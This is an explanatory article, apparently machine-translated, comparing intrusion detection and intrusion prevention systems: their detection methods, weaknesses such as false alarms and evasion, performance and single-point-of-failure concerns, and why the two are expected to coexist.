IDS technology
IDS can be divided into Host-based IDS (HIDS) and Network-based IDS (NIDS) based on different data sources ).
Both HIDS and NIDS can detect intrusion behaviors that the other party cannot detect and complement each other. The perfect IDS product should combine the two. Currently, mainstream IDS products use a hybrid IDS architecture that combines HIDS and NIDS.
Traditional intrusion detection technologies include:
1. Pattern Matching
Pattern matching is to compare the collected information with the known network intrusion and system misuse pattern databases to detect intrusions that violate security policies. An attack mode can be expressed by a process or an output.
This detection method only needs to collect relevant data sets for judgment, which can reduce system usage. Moreover, the technology is quite mature and the detection accuracy and efficiency are quite high. However, this technology needs to be constantly upgraded to deal with emerging attack methods, and cannot detect unknown attack methods.
2. Exception Detection
Exception detection first creates a statistical description for the System Object (users, files, directories, and devices), including the measurement attributes for normal use, such as the number of visits, operation failures, and latency. The average value of the measurement attribute is used to compare with the behavior of the network and system. When the observed value is out of the normal value range, IDS will determine whether an intrusion occurs. The advantage of exception detection is that it can detect unknown intrusions and complex intrusions. The disadvantage is that it has a high false positive rate and a high false negative rate.
3. Integrity Analysis
Integrity Analysis focuses on whether a file or object is tampered with. It mainly depends on the content and attributes of the file and directory. This detection method is particularly effective in detecting applications that have been changed and implanted with Trojan horses. Integrity analysis uses the encryption mechanism of the message digest function to identify minor changes. The advantage is that no matter whether the pattern matching method or the statistical analysis method can detect intrusion, integrity analysis can be found as long as the attack causes a change to the file or object. Integrity Analysis is generally implemented in batches and is not used for real-time response.
Problems faced by Intrusion Detection
1. False positives and false negatives
The IDS system often sends many false alarms. The main causes of false and false alarms are as follows:
● Currently, the main detection technology used by IDS is pattern matching. The Pattern Library is simple, not timely, and incomplete, and lacks the ability to detect unknown attacks;
● With the expansion of the network scale and the adoption of heterogeneous platforms and different technologies, especially the rapid growth of network bandwidth, the analysis and processing speed of IDS becomes increasingly difficult to keep up with network traffic, resulting in packet loss;
● The increasing number of network attack methods and the complexity of attack technologies and techniques also increase the false positives and false negatives of IDS.
2. DoS Attacks
IDS is a Fail Open mechanism. When IDS suffers a Denial-of-Service attack, this feature enables hackers to launch attacks without being discovered.
3. insert and circumvent
Insert attacks and avoidance attacks are two types of attacks that evade IDS detection. Insert attacks: You can customize some wrong data packets to the data stream, so that IDS is mistaken for attacks. On the contrary, attackers can bypass IDS detection to reach the target host.
The intention of the insert attack is to trigger frequent alerts (false alerts) for IDS, but the attack does not actually affect administrators. The intention to avoid attacks is to truly escape the detection of IDS and initiate attacks on the target host. Hackers often change attack features to cheat pattern-based IDS.
IDS Development Trend
When the time difference between security vulnerability discovery and attack is shrinking, IDS Based on the Feature Detection and matching technology is insufficient. IDS becomes a part of the security information management (SIM) framework.
In the SIM framework, IDS functions can be enhanced through detection and reporting techniques. Analysts pointed out that the role of IDS is becoming investigation and evidence collection and security analysis. About five years later, consistent security management and kernel-level security technologies will jointly end the mission of feature-based IDS technology.
Joel Snyder, a member of the US online world lab alliance, believes that in the future, it will be the world of hybrid technology and will be tested at the network edge and core layer, communication between sensor devices and correction consoles on the network will become the mainstream of security applications.
Some vendors conduct Association Analysis on IDS alarms and security vulnerability information to solve IDS defects. SIM vendors began to adopt a more modular approach to security information analysis, combining Security Vulnerability Management, exception detection, network evaluation, and honeypot modules with IDS modules, to better identify and respond to security events.
IPS active protection
Although IDS is a popular solution for enterprises, it is not enough to block the ever-evolving Internet attacks. A major problem with the intrusion detection system is that it does not actively block them before the attack occurs. At the same time, many intrusion detection systems are based on signatures, so they cannot detect new or old-fashioned attacks, and they cannot detect attacks in encrypted traffic.
Intrusion Protection System (IPS) tends to provide proactive Protection. It is designed to block intrusion activities and attacking network traffic in advance to avoid any losses, instead of sending an alert when or after malicious traffic is transmitted.
IPS can be directly embedded into network traffic to receive traffic from external systems through a network port, after checking that it does not contain abnormal activity or suspicious content, it is sent to the internal system through another port. In this way, problematic data packets and all subsequent data packets from the same data stream can be cleared on the IPS device.
To put it simply, IPS is equivalent to adding an intrusion detection system to the firewall, but it does not mean that IPS can replace the firewall or intrusion detection system. Firewall is a coarse-grained access control product. It performs well in filtering based on TCP/IP protocol, and in most cases, provides network address translation, Service proxy, traffic statistics, and other functions.
Compared with the firewall, IPS has a single function. It can only be connected to the network to filter out attacks that cannot be filtered by the firewall. In general, enterprise users focus on whether their networks can be prevented from being attacked and are not very keen on how many attacks can be detected.
However, this does not mean that the intrusion detection system is useless. In some professional organizations or places with high requirements on network security, the intrusion detection system is combined with other audit and tracking products, it can provide comprehensive audit materials for enterprise information resources, which play an important role in attack recovery, intrusion forensics, abnormal event identification, and network troubleshooting.
IPS currently mainly include the following types: 1. Host-Based Intrusion Protection (HIPS), which can protect server security vulnerabilities from being exploited by criminals; 2. Network-Based Intrusion Protection (NIPS), which can provide security protection for network systems by detecting network traffic. Once an intrusion is identified, NIPS can remove the entire network session, not just reset the session. 3. Application intrusion protection extends host-based intrusion protection to a network device located before the application server.
Challenges facing IPS
IPS technology faces many challenges, including three:
1. single point of failure. The design requires IPS to work in the network in the embedded mode, which may cause bottlenecks or spof. If IDS fails, the worst case is that some attacks cannot be detected. However, if an embedded IPS device fails, the normal operation of the network is seriously affected. If IPS is disabled due to a fault, the user will face a denial of service problem caused by IPS, and all customers will not be able to access the applications provided by the enterprise network.
2. performance bottleneck. Even if the IPS device does not fail, it is still a potential network bottleneck, which not only increases the lag time, but also reduces the network efficiency, IPS must be synchronized with the network traffic of several gigabytes or larger capacity. Especially when a large number of detection feature libraries are loaded, well-designed IPS embedded devices cannot support this response speed. Most high-end IPS product vendors use custom hardware (FPGA, network processor, and ASIC chip) to improve the operating efficiency of IPS.
3. False positives and false negatives. The false positive rate and false negative rate also need IPS to seriously face. In a busy network, if 10 alarms are processed per second, IPS must process at least 36000 alarms per hour, and 864000 alarms per day. Once an alert is generated, the most basic requirement is that IPS can effectively process the alert. If the intrusion features are not well written, "false positives" can be exploited, resulting in unexpected interception of legitimate traffic.
For real-time online IPS, once an attack packet is intercepted, all data streams from suspicious attackers are intercepted. If the traffic that triggers the false alarm happens to be part of a customer's order, the result can be imagined that the customer's entire session will be closed, in addition, all valid access requests from the customer to the enterprise network will be intercepted by the "due diligence" IPS.
IDS and IPS will coexist
Although IPS has a great advantage, the US online world lab Alliance member Rony Thayer believes that IPS cannot replace IDS devices until reporting and analysis are well-developed enough to prevent false alarms. IPS may replace the detection system of peripheral defense lines, and some locations in the network still need detection functions to enhance IPS that cannot provide a lot of event information.